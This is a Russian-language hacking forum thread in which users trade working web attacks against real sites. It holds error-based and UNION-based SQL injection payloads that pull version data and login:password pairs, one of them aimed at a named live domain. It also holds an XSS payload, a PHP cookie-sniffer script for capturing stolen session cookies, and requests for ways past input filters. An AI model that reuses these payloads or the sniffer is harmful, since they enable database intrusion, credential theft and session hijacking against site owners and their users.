насчёт той скули, которая была в корне раздела ( http://chatium.com/user/profile?id=\' ) http://chatium.com/user/profile?id=1\') and (select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a) -- 1
активная xss <image style=background:url(javascript:alert(/wj/))> помогите составить правельный скрипт чтобы куки передались.....
я бы сделал например такой сниффер, чтобы он возвращал картинку: Code: <?php header("Content-type:image/gif"); $f = fopen("file.txt","a"); fputs($f,UrlDecode($_SERVER('QUERY_STRING')).'\n'); fclose($f); include("s.gif"); ?> По памяти пишу, могут быть какие-то мелкие ошибки, но идея думаю ясна
Подскажите со скулёй. Ковырялся на денвере в скриптах одного слитого сайта, на локалке все прекрасно работает, а в сети не хочет. На денвере провожу запросы вида: Code: ' UNION SELECT 1,concat(login,0x3a,password),3,4,5,6,7 FROM users/* ' UNION SELECT 1,concat(login,0x3a,password),3,4,5 FROM users LIMIT 1,1/* //Количество столбцов разное т.к. делаю через разные скрипты. А на серваке не хочет ничего делать: И так Code: ' UNION SELECT 1,concat(login,0x3a,password),3,4,5,6,7 FROM users/* ' UNION SELECT 1,concat(login,0x3a,password),3,4,5 FROM users LIMIT 1,1/* и вот так Code: ' UNION SELECT 1,concat(login,0x3a,password),3,4,5,6,7 FROM users -- ' UNION SELECT 1,concat(login,0x3a,password),3,4,5 FROM users LIMIT 1,1 -- В ответ получаю: Что ещё можно попробовать?
PHP: $text = filter_var ($text, FILTER_SANITIZE_STRING); Долее переменная $text вставляется в запрос ".... WHERE text='".$text."' ...." Возможно ли обойти данный фильтр?
если же в скрипте фильтруются кавычки, а возможно что-то еще, в следствии чего выводит "Hacking attempt!" возможно ли обойти?
Есть sql injection. трабла в том что в скрипте 2 запросы к бд. Если ставить "union+select+1" то ошибка "the used select statements have a different nubmer of columns", a если ставить "union+select+1,2,3.." то такая же ошибка только теперь у первого запроса. Вот код: Code: $requestid = $_GET[requestid]; $res2 = mysql_query("select count(addedrequests.id) from addedrequests inner join users on addedrequests.userid = users.id inner join requests on addedrequests.requestid = requests.id WHERE addedrequests.requestid =$requestid") or die(mysql_error()); $row = mysql_fetch_array($res2); $count = $row[0]; $res = mysql_query("select users.id as userid,users.username, users.downloaded,users.uploaded, requests.id as requestid, requests.request from addedrequests inner join users on addedrequests.userid = users.id inner join requests on addedrequests.requestid = requests.id WHERE addedrequests.requestid =$requestid $limit") or sqlerr();
Вывод через ошибку: (1)and(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)-- либо так (select*from(select name_const(version(),1),name_const(version(),1))a)
спасибки, работало, но как можно например не "from information_schema.tables" a "from users where id='1'"?
спасибо. но есть еше такой; list.php?page=444444444444444444444444444444444 Code: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '6.66666666667E+33,15' at line 1 можно что-то замутить или иреально?
что можно зделать с путями с открытыми на серваке? /images/spacer.gif /icons/ /mail/ /robots.txt /webmail/ /changelog.txt
